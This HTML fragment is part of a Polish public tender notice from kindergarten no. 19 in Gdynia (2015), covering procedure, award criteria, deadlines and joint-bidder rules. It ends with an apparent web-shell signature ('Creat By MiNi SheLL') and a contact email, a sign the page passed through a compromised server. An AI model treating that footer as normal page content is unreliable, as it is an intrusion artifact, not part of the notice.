<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja i rękojmia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na zasadach określonych we Wzorze umowy stanowiącej Załącznik nr 8 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.gdynia.pl/bip/BIPInfo/4804_.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole nr 19
ul. Harcerska 4
81-425 Gdynia
Tel. (58) 622 12 42 Fax. (58) 622 12 42 
E-mail: ps19gdy@wp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2015 godzina 09:00, miejsce: Przedszkole nr 19
Gabinet Dyrektora, I piętro
ul. Harcerska 4
81-425 Gdynia
Tel. (58) 622 12 42 Fax. (58) 622 12 42 
E-mail: ps19gdy@wp.pl.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2.Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3.Wykonawcy, o których mowa w pkt 1 powyżej, ponoszą solidarną odpowiedzialność za wykonanie umowy.
4.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, każdy z warunków, o którym mowa w pkt VII.1 ppkt 1) - 4) SIWZ, winien spełniać co najmniej jeden z tych Wykonawców, albo wszyscy ci Wykonawcy wspólnie.
5.Warunek określony w pkt. 2  powyżej, powinien spełniać każdy z Wykonawców samodzielnie.
6.Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na zasadach określonych we Wzorze umowy stanowiącej Załącznik nr 8 do SIWZ.
7.Zamawiający przewiduje możliwość wykluczenia z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie (art. 24 ust. 2a ustawy Pzp).
8.W przypadku gdy wartości podane przez Wykonawców na oświadczeniach i dokumentach, o których mowa w pkt VIII ust. 1 SIWZ, podane będą w walucie innej niż PLN, Zamawiający przeliczy te wartości na PLN przyjmując średni kurs NBP danej waluty na dzień wszczęcia postępowania.
9.Wszelkie nieuregulowane w niniejszym SIWZ oraz ogłoszeniu czynności, uprawnienia, obowiązki Wykonawców i Zamawiającego, których ustawa Pzp nie nakazała zawierać Zamawiającemu w SIWZ, a które mogą przyczynić się do właściwego przebiegu postępowania, reguluje ustawa Pzp oraz rozporządzenia wydane na jej podstawie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com